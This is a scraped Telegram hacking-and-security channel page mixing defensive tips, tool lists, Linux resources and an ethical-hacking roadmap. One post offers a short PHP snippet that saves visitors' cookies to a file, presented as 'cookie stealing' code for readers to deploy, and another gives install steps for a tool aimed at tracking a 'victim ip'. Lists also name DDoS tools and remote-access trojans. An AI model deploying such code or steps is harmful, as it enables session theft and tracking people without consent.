CyberSecurity & AI Experts
40.8K subscribers
336 photos
378 files
330 links
๐Ÿ”ฐ Ethical Hacking and Cyber Security Official Telegram Channel
๐Ÿ”ฐ Free content to learn Hacking & AI

For promotions: @coderfun
Download Telegram
๐Ÿ‘20๐Ÿ”ฅ9โค3โœ3๐Ÿ‘2
๐Ÿ”ฐHow Do I Protect My Computer From Bots?๐Ÿ”ฐ

๐Ÿค–Itโ€™s Very Possible To Protect Your Computer From Bots, But it Takes Diligence And Knowing What To Look For. Use The Following Tips To Keep Your Computer Safe:

๐ŸŒ€Install Firewalls To Block Malicious Attacks And Never Turn Them Off.

๐ŸŒ€Use A Long And Complicated Password That Contains Numbers And Symbols.

๐ŸŒ€Never Use The Same Password For Multiple Programs.

๐ŸŒ€Install Quality Anti-Malware Software Such As Norton security to protect your device.

๐ŸŒ€Ensure Software Is Up To Date, And Never Ignore System Updates.

๐ŸŒ€Refrain From Using Flash Drives, Or Thumb Drives, In An Infected Computer.

โžก๏ธ Give Reactions ๐ŸคŸ
๐Ÿ‘16โค4๐Ÿ”ฅ1๐Ÿ‘1
๐Ÿ”ฐ7 Best Hacking Tools Everyone Must Know๐Ÿ”ฐ

1. Nmap
It is a free and open-source tool that is used for network discovery and security auditing.

2. Metasploit
It is basically a Security Assessment and Penetration Testing tool. Metasploit can be used to launch an attack on other systems with it.

3. Angry IP Scanner
It is one of the fastest IP addresses and port scanner. By using this hacker can easily gather information about open ports in the target system.

4. Nikto
It is a webserver assessment tool. Nikto is an open-source platform that performs tests against Web Servers to find various vulnerable files, misconfigurations, outdated servers and programs on that web server.

5. John the Ripper
JTR is free and open-source software that is widely used by hackers for password cracking. It uses the various cryptanalysis attacks such as โ€œDictionary Attackโ€ and โ€œBrute-Force Attackโ€.

6. Wireshark:
It is an open-source tool that is used to capture traffic on the network. It is basically a network protocol analyzer tool.

7. Burp Suite:
It is an integrated platform that is used for performing a test on web application security.

โžก๏ธ Give Reactions ๐ŸคŸ
๐Ÿ‘30โค7๐Ÿ”ฅ5๐Ÿ‘จโ€๐Ÿ’ป5๐Ÿ‘2๐Ÿ˜1๐Ÿ‘Œ1
TUTORIAL : How To Change Your IP Address

สแดแดœ แด„แดแดœสŸแด… แด…แด แด›สœษชs สŸแด‡ss แด›สœแด€ษด แด€ แดษชษดแดœแด›แด‡

๐—š๐˜‚๐—ถ๐—ฑ๐—ฒ -

Click on "Start" in the bottom left hand corner of ๐˜€๐—ฐ๐—ฟ๐—ฒ๐—ฒ๐—ป

Click on "Run"

Type in "command" and hit ok
You should now be at an MSDOS prompt screen.

Type "ipconfig /release" just like that, and hit "enter"

Type "exit" and leave the prompt
โ€ข Right-click on "Network Places" or "My Network Places" on your desktop.

Click on "properties" You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

Right click on "Local Area Connection" and click "properties"

Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" ๐˜๐—ฎ๐—ฏ

Click on "Use the following IP address" under the "General" ๐˜๐—ฎ๐—ฏ

Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).

Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.

Hit the "Ok" button ๐—ต๐—ฒ๐—ฟ๐—ฒ

Hit the "Ok" button again You should now be back to the "Local Area Connection" screen.

Right-click back on "Local Area Connection" and go to properties again.

Go back to the "TCP/IP" ๐˜€๐—ฒ๐˜๐˜๐—ถ๐—ป๐—ด๐˜€

This time, select "Obtain an IP address automatically" tongue.gif

18. Hit "Ok"

Hit "Ok" ๐—ฎ๐—ด๐—ฎ๐—ถ๐—ป

โžก๏ธ Give Reactions ๐ŸคŸ
๐Ÿ‘23โค5๐Ÿ˜5
โ‡๏ธShut Down your ANDROID Device by Making Call from Another Phone (like a pro)
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–

๐Ÿ”นStep 1: First of all, download and install the Automateit app. This app needs root access. So, make sure to grant the root permission.

๐Ÿ”นStep 2: Next, select โ€˜My Rulesโ€™ and tap on the (+) icon.

๐Ÿ”นStep 3: In the next screen tap on the โ€˜Call State Triggerโ€™

๐Ÿ”นStep 4: Now, choose the option โ€˜Incoming Callโ€™

๐Ÿ”นStep 5; In the next step, select the contact. You can choose from saved contacts or can create a new one.

๐Ÿ”นStep 6: Now tap on โ€˜Nextโ€™ and on the next screen, select โ€˜Shutdown Device Actionโ€™

๐Ÿ”นStep 7: Now you need to provide the name for the rule and save the rule.

Now you just need to make a call from the contact you specified and your Android device will be shut down.
๐Ÿ‘10๐Ÿ”ฅ3
Track Location With Live Address And City in Termux

IpHack: is a tracking tool for both IP location and tracking testing.

Installation ~

apt update && apt upgrade

apt install git

git clone https://github.com/mishakorzik/IpHack

cd IpHack

bash setup.sh

chmod +x *

cd IpHack

python IpHack.py -t (victim ip)

Enjoy ๐ŸคŸ

โžก๏ธ Give 100+ Reactions ๐ŸคŸ
๐Ÿ”ฅ33๐Ÿ‘17๐Ÿ‘Ž6โค1๐ŸŽ‰1
#lifehack

How to always run Google Chrome in incognito mode in Windows 10

If you want to use "Incognito" mode in Google Chrome browser by default, you can set it to start in that mode right away.

1. Right-click on the Chrome shortcut and select "Properties".
3. On the "Shortcut" tab, find the "Object" text box. It will contain the following:
"C:Program Files (x86)GoogleChromeApplicationchrome.exe".
4. modify the content of the "Object" field by adding "-incognito" at the end, separated by a space.
5. Click on "Apply".

The next time you open Chrome using this shortcut, it will automatically launch in "Incognito" mode.
๐Ÿ‘8โค2
โœจCOOKIE STEALING CODE IN PHP STORES ON CPANELโœจ

<?php
// Steal the user's cookies
if (isset($_COOKIE['user'])) {
    //store in file
    $cookie = json_encode($_COOKIE['user']);
    $filename = 'stolen_cookies_' . date('m_d_Y') . '.txt';
    file_put_contents('/filemanager/'. $filename, $cookie);
}
?>

โš ๏ธUSE YOUR BRAIN NOW TO IMPLEMENT ON  YOUR STUFF ๐Ÿ˜ˆ

โžก๏ธ Give Reactions ๐ŸคŸ
๐Ÿ‘13๐Ÿคฉ6๐ŸŽ‰1
๐Ÿ”ฐHow Do I Protect My Computer From Bots?๐Ÿ”ฐ

๐Ÿค–Itโ€™s Very Possible To Protect Your Computer From Bots, But it Takes Diligence And Knowing What To Look For. Use The Following Tips To Keep Your Computer Safe:

๐ŸŒ€Install Firewalls To Block Malicious Attacks And Never Turn Them Off.

๐ŸŒ€Use A Long And Complicated Password That Contains Numbers And Symbols.

๐ŸŒ€Never Use The Same Password For Multiple Programs.

๐ŸŒ€Install Quality Anti-Malware Software Such As Norton security to protect your device.

๐ŸŒ€Ensure Software Is Up To Date, And Never Ignore System Updates.

๐ŸŒ€Refrain From Using Flash Drives, Or Thumb Drives, In An Infected Computer.

โžก๏ธ Give Reactions ๐ŸคŸ
๐Ÿ‘8โค5
๐Ÿ–ฅ 100 Web Vulnerabilities, categorized into various types : ๐Ÿ˜€

โšก๏ธ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)


โšก๏ธ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse


โšก๏ธ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling


โšก๏ธ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration


โšก๏ธ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb


โšก๏ธ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control


โšก๏ธ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection


โšก๏ธ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation


โšก๏ธ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols


โšก๏ธ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues


โšก๏ธ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service


โšก๏ธ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse


โšก๏ธ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering


โšก๏ธ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities


โšก๏ธ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues


โšก๏ธ Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass


โšก๏ธ Server-Side Request Forgery (SSRF):
87. Blind SSR
88. Time-Based Blind SSRF


โšก๏ธ Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass


โšก๏ธ Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws


โšก๏ธ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits


โžก๏ธ Give 100+ Reactions ๐Ÿ˜Ž
๐Ÿ”ฅ22๐Ÿ‘10โค6๐Ÿ˜ฑ3๐Ÿคฉ1
๐Ÿ”ฅ๐Ÿ”ฅ If you want to become a hacker, it is essential to always be knowledgeable about what steps to do๐Ÿ”ฅ๐Ÿ”ฅ

1-Network Plus
2-CEH
3-Linux Commands
4-Cmd Commands
5-Windows Tools
6-Kali Linux Tools
7-Learning Php
8-Learning Python
9-Learning Ruby
10-Learning Perl
...
#exploithub

1-DDoS
2-Forensics
3-Programming
4-Exploitation
5-Phone Hacking
6-Server Hacking
7-Client Hacking
8-Website Hacking
9-Network Hacking
10-Wireless Hacking
11-Reverse Engeenering
12-Information Gathering

#DDoS
1-MDK3
2-LOIC
3-HULK
4-DDOSIM
5-Ufonet
6-Hping3
7-Xerxes
8-Hammer
9-Slowloris
10-Websploit
11-GoldenEye
12-Metasploit
13-Aireplay-ng
14-Slowhttptest

#Forensics
1-COFEE
2-Volafox
3-Autopsy
4-Foremost
5-Hashdeep
6-Binwalk

#Programming
1-Notepad++
2-Visual Studio
3-Text Editor

#Exploitation
1-Metasploit
2-Sqlmap
3-Core Imact
4-W3af
5-BeEF
6-Dradis

#Phone_Hacking
1-Metasploit
2-Apktool
3-Droidjack
4-AndroRAT
5-Spynote

#Server_Hacking
1-SQLmap
2-Jsql
3-Havij
4-Hydra
5-Metasploit
6-Armitage
7-Brupsuite
8-Owasp-ZAP
9-Netsparker
10-Acunetix
11-OpenVAS

#Client_Hacking
1-Darkcomet
2-FatRat
3-Veil-Evasion
4-Shallter
5-Unicorn
6-Setoolkit
7-Armitage
8-BeEF-Framework
9-EmPyre
10-FakeImageExploiter
11-Pupy
12-DFU-Programmer
13-Cobalt Strike
14-Exploitpack
15-Gcat
16-Crowbar

#Website_Hacking
1-Sn1per
2-Owasp-ZAP
3-Brupsuite
4-Netsparker
5-Acunetix
6-SQLmap
7-Xsser
8-WPScan
9-Joomrra
10-Joomscan
11-WPSeku
12-XSStrike
13-Kadimus
14-jexboss
15-CMSmap
16-brut3k1t
17-0d1n
18-CloudFail
19-Arachni
20-Nikto
21-Webscarab
22-Nmap
23-Vbscan
24-Sentry MBA

#Network_Hacking
1-MITMf
2-Bettercap
3-Ettercap
4-Tcpdump
5-Wireshark
6-Driftnet
7-SSLstrip
8-Armitage
9-Metasploit
10-Xerosploit
11-Sparta
12-Hydra

#Wireless_Hacking
1-Wifite
2-Airodump-ng
3-Aireplay-ng
4-Wash
5-WiFi Pumpkin
6-Wifiphisher
7-Fluxion
8-Infernal Twin
9-WPSpin

#Reverse_Engeenering
1-OWASP-ZSC
2-OllyDBG
3-Apktool

#Information_Gathering
1-Enum
2-Recon
3-Whois
4-Email Contact
5-Phone Contact
6-Service Status
7-Protocol Analysis
๐Ÿ‘36โค16๐Ÿ‘7
๐ŸŒ€ONE PROBLEM, ONE TOOL๐ŸŒ€

PROBLEMS                    - TOOLS
1. Graphic Design         - Canva
2. Subtitles                    - Blink
3. Digital Store              - Gumroad
4. Link in Bio                 - Stan store
5. Payment Gateway    - Wise
6. Profile Picture           - Pfpmaker
7. IG Automation          - Manychat
8. Email Marketing       -  ConvertKit
9. Design Anything       - Gen Al Firefly
10. Viral Analytics        - ViralFindr
11. Digital Products     - Product hunt
12. Logo                        - Lookadesign
13. Content Idea          - ChatGPT
๐Ÿ‘24โค4๐Ÿ”ฅ1
This media is not supported in your browser
VIEW IN TELEGRAM
18 most used Linux commands YOU MUST KNOW

- ls
- mv
- ssh
- cd
- cat
- sudo
- pwd
- grep
- top
-mkdir
- find
- wget
- rm
- chmod
- tar
- cp
- chwon
- gzip
๐Ÿ‘28โค6
18 Websites To Learn Linux For FREE

1. nixCraft
2. Tecmint
3. Linuxize
4. Itโ€™s FOSS
5. Linux Hint
6. LinuxOPsys
7. Linux Journey
8. Linux Academy
9. Linux Survival
10. Linux Command
11. Ryanโ€™s Tutorials
12. Linux Handbook
13. Linux FoundationX
14. LabEx Linux For Noobs
15. Guru99 Linux Tutorial Summary
16. Conquering the command line
17. Intellipat Linux Tutorial for Beginners
18. The Debian Administrators Handbook

โžก๏ธ Give Reactions ๐ŸคŸ
๐Ÿ‘39โค17๐Ÿ‘6๐Ÿ†’6๐Ÿ”ฅ4๐Ÿคฉ2
Here are 27 ways to learn ethical hacking for free:

1. Root Me โ€” Challenges.
2. Stรถk's YouTube โ€” Videos.
3. Hacker101 Videos โ€” Videos.
4. InsiderPhD YouTube โ€” Videos.
5. EchoCTF โ€” Interactive Learning.
6. Vuln Machines โ€” Videos and Labs.
7. Try2Hack โ€” Interactive Learning.
8. Pentester Land โ€” Written Content.
9. Checkmarx โ€” Interactive Learning.
10. Cybrary โ€” Written Content and Labs.
11. RangeForce โ€” Interactive Exercises.
12. Vuln Hub โ€” Written Content and Labs.
13. TCM Security โ€” Interactive Learning.
14. HackXpert โ€” Written Content and Labs.
15. Try Hack Me โ€” Written Content and Labs.
16. OverTheWire โ€” Written Content and Labs.
17. Hack The Box โ€” Written Content and Labs.
18. CyberSecLabs โ€” Written Content and Labs.
19. Pentester Academy โ€” Written Content and Labs.
20. Bug Bounty Reports Explained YouTube โ€” Videos.
21. Web Security Academy โ€” Written Content and Labs.
22. Securibee's Infosec Resources โ€” Written Content.
23. Jhaddix Bug Bounty Repository โ€” Written Content.
24. Zseano's Free Bug Bounty Methodology โ€” Free Ebook.
25. Awesome AppSec GitHub Repository โ€” Written Content.
26. NahamSec's Bug Bounty Beginner Repository โ€” Written Content.
27. Kontra Application Security Training โ€” Interactive Learning.
โค27๐Ÿ‘19
How to Become Ethical Hacker In 2024

1. Develop a Strong Foundation in Computer Science and Programming:

Master a programming language like Python, Java, or C++. These languages are widely used in cybersecurity tools and scripts.

Understand computer networking concepts like TCP/IP, network protocols, and routing mechanisms.

Familiarize yourself with operating systems, including Linux, Windows, and macOS, as you'll be interacting with various systems during ethical hacking.

2. Learn Cybersecurity Fundamentals:

Grasp the principles of cryptography, encryption techniques, and hashing algorithms.

Understand vulnerability assessment and penetration testing (VAPT) methodologies.

Familiarize yourself with common security threats, attack vectors, and exploit techniques.

Explore web application security concepts, including SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF).

3. Enroll in Ethical Hacking Courses and Certifications:

Consider pursuing certifications like Certified Ethical Hacker (CEH) or CompTIA Penetration Testing+ (PT+) to validate your skills and knowledge.

Participate in online courses or bootcamps offered by reputable institutions to gain hands-on experience and practical skills.

Engage in virtual labs and Capture the Flag (CTF) competitions to test your skills and practice ethical hacking techniques.

4. Join Online Communities and Engage with Experts:

Engage in online forums, discussion groups, and communities dedicated to ethical hacking.

Connect with experienced hackers and cybersecurity professionals to seek guidance and mentorship.

Participate in workshops, conferences, and networking events to expand your knowledge and connections.

5. Contribute to Open-Source Projects and Build a Portfolio:

Contribute to open-source security projects to gain real-world experience and demonstrate your skills.

Participate in bug bounty programs to identify and report vulnerabilities in various systems.

Build a personal portfolio showcasing your ethical hacking projects, certifications, and contributions.

6. Stay Updated with the Latest Cybersecurity Trends:

Continuously read industry news, blogs, and research papers to keep abreast of emerging threats and vulnerabilities.

Participate in online webinars, workshops, and training sessions to stay updated on the latest hacking techniques and tools.

Attend cybersecurity conferences and events to network with experts and learn about cutting-edge technologies.
๐Ÿ‘18โค14
Well Known TCP/UDP Ports
๐Ÿ‘14โค2
30 Days Roadmap to learn Ethical Hacking ๐Ÿ‘‡๐Ÿ‘‡

Day 1-3: Introduction to Ethical Hacking
- Understand the basics of ethical hacking and its importance
- Learn about different types of hackers and their motivations
- Explore the legal and ethical considerations of ethical hacking

Day 4-7: Networking Fundamentals
- Learn about networking protocols, IP addresses, and subnets
- Understand how data is transmitted over networks
- Explore common network vulnerabilities and how to secure them

Day 8-10: Information Gathering and Footprinting
- Learn how to gather information about a target system or network
- Explore techniques such as passive information gathering and footprinting
- Understand the importance of reconnaissance in ethical hacking

Day 11-14: Scanning and Enumeration
- Learn how to scan for open ports and services on a target system
- Understand the concept of enumeration and its role in ethical hacking
- Explore tools such as Nmap for scanning and enumeration

Day 15-17: Vulnerability Assessment and Exploitation
- Learn how to identify and assess vulnerabilities in a target system
- Understand common exploitation techniques and tools used in ethical hacking
- Explore how to exploit vulnerabilities responsibly and ethically

Day 18-21: Web Application Security
- Learn about common web application vulnerabilities (e.g., SQL injection, XSS)
- Understand how to secure web applications against attacks
- Explore tools such as Burp Suite for web application testing

Day 22-24: Wireless Network Security
- Learn about common wireless network vulnerabilities and attacks
- Understand how to secure wireless networks against intruders
- Explore tools such as Aircrack-ng for wireless network penetration testing

Day 25-27: Social Engineering and Physical Security
- Learn about social engineering techniques used in ethical hacking
- Understand the importance of physical security in cybersecurity
- Explore ways to protect against social engineering attacks

Day 28-30: Penetration Testing and Reporting
- Learn how to conduct penetration tests on systems and networks
- Understand the methodology of penetration testing (e.g., reconnaissance, scanning, exploitation, reporting)
- Practice conducting penetration tests on virtual environments and create detailed reports on findings

Remember to practice your skills in a controlled environment and always seek permission before performing any ethical hacking activities. Additionally, consider obtaining relevant certifications such as Certified Ethical Hacker (CEH) to validate your skills in ethical hacking.

Some good resources to learn Ethical Hacking

1. Tutorials & Courses
   - Informarion Security Free Course
   - Ethical Hacking Bootcamp
   - Network Hacking Course

2. Telegram Channels
   - Cyber Security and Ethical Hacking
   - Ethical Hacking Books

3. Books
   - Ultimate Linux Free Book
   - Python for Ethical Hacking

4. Ethical Hacking Forums

Join @free4unow_backup for more free resources

ENJOY LEARNING ๐Ÿ‘จโ€๐Ÿ’ป๐Ÿ”’
๐Ÿ‘27โค7๐Ÿ‘1